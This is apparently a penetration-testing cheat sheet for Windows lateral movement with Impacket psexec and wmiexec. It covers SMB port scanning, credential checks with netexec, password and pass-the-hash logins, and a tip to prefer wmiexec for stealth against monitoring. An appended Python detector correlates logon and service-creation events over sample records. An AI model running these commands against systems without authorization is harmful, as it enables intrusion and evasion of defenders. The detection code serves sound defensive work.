Using impacket-psexec or impacket-wmiexec

# Check whether the SMB ports are open.
nmap -p 139,445 $IP

# If the port is open, confirm that the username and password are accepted. If the output shows "pwned", the account is allowed to log in.
netexec smb $IP -u $UserName -p '$Password' --continue-on-success

# Normal login with a password
impacket-psexec $UserName:'$Password'@$IP
impacket-wmiexec $UserName:'$Password'@$IP

# Login with an NTLM hash (the -hashes format is LMHASH:NTHASH; the LM half is left empty here)
impacket-psexec -hashes :$NTLMhash $UserName@$IP
impacket-wmiexec -hashes :$NTLMhash $UserName@$IP
  • Use wmiexec for stealthier operations, fileless execution, and lower footprint, ideal for environments with tight security monitoring.

  • Use psexec if you need an interactive session and aren’t concerned about leaving traces or have full administrative privileges that allow service creation.
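As an added defender-side example (not part of the original cheat sheet): the service creation that psexec depends on is recorded on the target as Windows System event 7045, shortly after the network logon that delivered it (Security event 4624, logon type 3). The script below correlates the two over constructed sample records with a simplified field layout; the event IDs are real, the records and field names are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real logs). Each dict is a simplified view of a
# Windows event: 4624 with logon_type 3 = network logon (Security log), 7045 = a
# new service was installed (System log). "user" on the 7045 record stands in for
# the event's UserID field, i.e. the account that created the service.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T10:00:00", "id": 4624, "user": "svc_admin",
     "src_ip": "10.0.0.5", "logon_type": 3},
    {"ts": "2024-05-01T10:00:02", "id": 7045, "user": "svc_admin",
     "service": "XwYzAbCd", "path": "%SystemRoot%\\XwYzAbCd.exe"},
    {"ts": "2024-05-01T11:00:00", "id": 7045, "user": "SYSTEM",
     "service": "Sysmon64", "path": "C:\\Windows\\Sysmon64.exe"},
    {"ts": "2024-05-01T12:00:00", "id": 4624, "user": "alice",
     "src_ip": "10.0.0.9", "logon_type": 3},
    {"ts": "2024-05-01T14:00:00", "id": 7045, "user": "alice",
     "service": "LateSvc", "path": "C:\\Tools\\late.exe"},
]

# Services your own tooling legitimately installs; extend per environment.
KNOWN_SERVICES = {"Sysmon64"}
WINDOW = timedelta(seconds=60)


def find_remote_service_installs(events, known=KNOWN_SERVICES, window=WINDOW):
    """Return 7045 service installs that are not allowlisted and that follow a
    network logon by the same account within `window` (the psexec pattern:
    SMB logon, then service creation)."""
    alerts = []
    last_network_logon = {}  # user -> (timestamp, source ip)
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if ev["id"] == 4624 and ev.get("logon_type") == 3:
            last_network_logon[ev["user"]] = (ts, ev["src_ip"])
        elif ev["id"] == 7045 and ev["service"] not in known:
            logon = last_network_logon.get(ev["user"])
            if logon and ts - logon[0] <= window:
                alerts.append({"ts": ev["ts"], "user": ev["user"],
                               "src_ip": logon[1], "service": ev["service"],
                               "path": ev["path"]})
    return alerts


if __name__ == "__main__":
    for a in find_remote_service_installs(SAMPLE_EVENTS):
        print(f"{a['ts']} {a['user']} from {a['src_ip']} installed "
              f"{a['service']} ({a['path']})")
```

Only the svc_admin install is flagged: Sysmon64 is allowlisted and alice's service came two hours after her logon. wmiexec creates no service, so this rule does not see it; that is the lower footprint the note above refers to.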
